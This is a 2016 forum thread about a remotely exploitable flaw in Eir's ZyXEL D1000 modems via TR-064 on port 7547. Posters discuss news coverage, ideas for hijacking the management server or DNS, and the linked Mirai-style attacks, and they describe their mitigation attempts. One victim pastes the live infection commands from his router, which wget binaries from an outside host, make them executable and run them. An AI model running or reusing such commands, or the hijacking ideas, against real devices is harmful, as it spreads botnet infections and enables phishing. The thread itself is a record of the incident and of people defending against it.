Eir home router vulnerability.

Alcoheda

Looks like Eir have made a dog's dinner of the security on their D1000 modem.

http://www.theregister.co.uk/2016/11/22/eir_customers_modems_vulnerable/

The ZyXEL-built Eir D1000 comes with an open TCP port, 7547, which is used by the CPE WAN Management Protocol to manage the modems on Eir's network.

"By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall," kenzo's post says. "This allows access to the web administration interface from the Internet-facing side of the modem. The default login password for the D1000 is the Wi-Fi password. This is easily obtained with another TR-064 command."

The Register seem to be the only source at the moment, Eir have declined to comment.

Sleep soundly

AnCatDubh

I recall something about another Eir(com) router - DSL grade (can't recall which model), which on the admin login page had the admin password embedded as a comment in the HTML(!!). I came across it on these forums and verified myself that this was the case as I had the same router. Though now I am no longer an Eir(com) customer (not specifically for that reason though).

EDIT: Here's that thread that I was referring to. http://www.boards.ie/vbulletin/showthread.php?p=93275394

_Puma_

Heads should roll for this. I've started a thread in the Talk to Eir section of boards.

"Back in the days when Eir were Eircom and they used Netopia modems, port 7547 was blocked to every IP address except those assigned to Eir’s management servers. This meant even though the Netopia modems had bugs, they could not be exploited. Inexplicably, Eir do not do this for their newer modems. If they did, these bugs would not have been exploitable".

I saw this talk at DefCon 2 years ago and it described a different albeit similar protocol and pretty much the same vulnerability.

infodox

Trivially exploitable remotely. Exploit Code/Screenshot
You can do the config dumping and changing on Vodafone (Ireland), TalkTalk (UK), Plusnet (UK), Demon (UK), Post Office Broadband (UK) ones as well. Have yet to test it on the ZyXEL's that Zen Internet (UK) ship. So far the remote command injection has only worked in tests I was able to perform on Eir ones.

Alcoheda

That's shocking, Do you think these routers are being attacked in the wild?
I mean I could probably write a botnet with that information and I know basically nothing.

infodox

They probably are being actively exploited (probably at a small scale) by now.
More interestingly, while reading the TR-064 spec I noticed there is a config value you can set to change the ACS management server to one of your choice, lol.
So instead of dropping malware on them in the "usual fashion", you could just set up your own ACS server (there are F/OSS packages out there for this) and mass-change the settings so they are now "managed" by you instead of the ISP.
You could also engage in widespread "pharming" by remotely updating the DNS servers they use to ones under your control, and then proceed to redirect users to phishing pages instead of legitimate sites. This has been done before by exploiting CSRF bugs in routers and broken authentication issues.

KAGY

This might be cuurrently exploited. I noticed that my NTP server field was set to run a line of script rather than an ip address.
something like change to tmp wget from l.ocal.host (extra dot included) and change perms to 777

Joe Exotic

Similar attack in germany

http://www.bleepingcomputer.com/news/security/900-000-routers-knocked-offline-in-germany-amid-rumors-of-cyber-attack/

https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-router-vulnerability/

jgorres

Here a comment from the (German) Heise Forum, mentioning a majority of those attacks coming from EIRCOM.

Here the article about the D1000 vulnarability.
--
For security reasons this reply was encrypted twice using ROT13.

KAGY

OK, my D1000 is definitely hacked. NTP server IP is a wget to this file/script
cd /var/tmp;cd /tmp;wget http://binpt.pw/1;chmod 777 1;busybox chmod 777 1;./1;rm -f ./*
cd /var/tmp;cd /tmp;wget http://binpt.pw/2;chmod 777 2;busybox chmod 777 2;./2;rm -f ./*
cd /var/tmp;cd /tmp;wget http://binpt.pw/3;chmod 777 3;busybox chmod 777 3;./3;rm -f ./*
cd /var/tmp;cd /tmp;wget http://binpt.pw/4;chmod 777 4;busybox chmod 777 4;./4;rm -f ./*

jgorres

Welcome to the wonderful and weird world of bot nets.
--
In a perfect world spammers would get caught, go to jail, and share a cell with many men who have enlarged their penisses, taken Viagra and are looking for a new relationship.

KAGY

Does anyone know how I can stop this while I research a new router. I've performed a full factory reset, installed a clean ROM from eir and changed the v default ports on the v remote management tab. But it keeps getting hacked.

Tonight's efforts included Tried making /tmp read only, killing the tr069 process so we wait and see.

BTW I'm now with Vodafone so I'm not sure if I'll get any fix from eir

Recommendations for router that can run open WRT or similar also appreciated :-)

jgorres

Wow,

Most probably you are the only one on the whole EIR network, trying to get rid of the problem.

I am with DigiWeb (using EIR's backbone) on a standard DSL line.

Finally, DigiWeb blocked the relevant port to be reachable from the whole world. At the beginning of the attack the port was accessible. According to your post, EIR leaves their customers at risk allowing access for the world to those port through their network on to the customers' routers.

I prefer BuffaloTech Airstations for setup with OpenWRT. I do not know which current models are compatible, just check the TOH.

BuffaloTech also sells Airstations with pre-installed DD-WRT, if that suits you.

Regards,
Jörn.

infodox

Finally published my writeup on the issue along with lengthy lists of impacted devices/vendors, and possible ways the issue could be exploited.
Probably will add more later - still reversing the malware itself that is being installed on the devices.

Ziycon

Looks like eir have come clean, http://www.rte.ie/news/2016/1205/836708-eir-broadband/

jgorres

Interesting is

• here, on boards.ie, up to now 16 messages in this thread

versus

• 352 messages (05.12.16, 21:00) on heise.de, where they discussed the results of this attack on the German Telekom network

What did we learn from thes figures?

<sacrcasm>The impact here in Ireland was not strong enough, i.e. Facebook, Twitter and WhatsApp were not slow enough for people to complain.</sarcasm>

TheRiverman

The ZyXel modems are rubbish compared to the Netopia model that was used some years ago.

L1011

jgorres wrote: »

What did we learn from thes figures?

<sacrcasm>The impact here in Ireland was not strong enough, i.e. Facebook, Twitter and WhatsApp were not slow enough for people to complain.</sarcasm>

I'd take a stab that its more than technically minded people are more likely to have VDSL or cable than in Germany where lower speed DSL rules the roost. And its a smaller country.

jgorres

One point is that the vast majority of users aren't geeks. They simply want (and need) a box, which they plug into the socket the telco technician installed. Plug and play.

The telcos deliver those boxes. Their approach is mainly based on the costs for those boxes, i.e. they need to be cheap. They take a crappy box, put some modified crippleware on it (company logo on admin interface is very important) and give them to their customers. Fire and forget.

The point on the figures is not the absolute number. Over in Germany even the number of about 900,000 affected Telekom users (which from an Irish point of view is large) represents only a small portion of the overall Telekom broadband customers (13 millions, reference for this figure). Just 7 % of affected routers in the Telekom network made it coughing and rattling.

And, according to EIR, just 1,800 routers were infected, but this small numbers caused those massive problems elsewhere (this is simplified, as not only EIRCOM is to blame and the Telekom routers have not been infected by the attack, but simply stopped working for another reason).

I do not wish to fall back into history, where viruses were distributed via floppy disks and when you were king, when you had a 14,400 baud modem. However, it is a bit strange when one has to check the firewall because he changed a light bulb.

At some point the so-called "smart" internet combined with the current security attitude will cause massive problems.

Ziycon

I truly wonder who these companies hire sometimes!

Speaking on RTÉ’s Morning Ireland, Eir’s director of communications Paul Bradley said that the company became aware of a potential security vulnerability after details surrounding the risks were posted on the internet.

"It came to light because there was a post online," he said.

http://www.thejournal.ie/eir-modem-hack-3122232-Dec2016/

jgorres

Ziycon wrote: »

I truly wonder who these companies hire sometimes!

"It came to light because there was a post online," he said. http://www.thejournal.ie/eir-modem-hack-3122232-Dec2016/

At least, they are not illiterate!

The high horse brigade

Ziycon wrote: »

I truly wonder who these companies hire sometimes!



http://www.thejournal.ie/eir-modem-hack-3122232-Dec2016/

The person who found the vulnerability posted it online, nothing strange here

KAGY

KAGY wrote: »

Tonight's efforts included Tried making /tmp read only, killing the tr069 process so we wait and see.

One of these seemed to work, until i next reboot anyway. Of course it could be Vodafone blocking the port.

KAGY

KAGY wrote: »

Tonight's efforts included Tried making /tmp read only, killing the tr069 process so we wait and see.

One of these seemed to work, until i next reboot anyway. Of course it could be Vodafone blocking the port.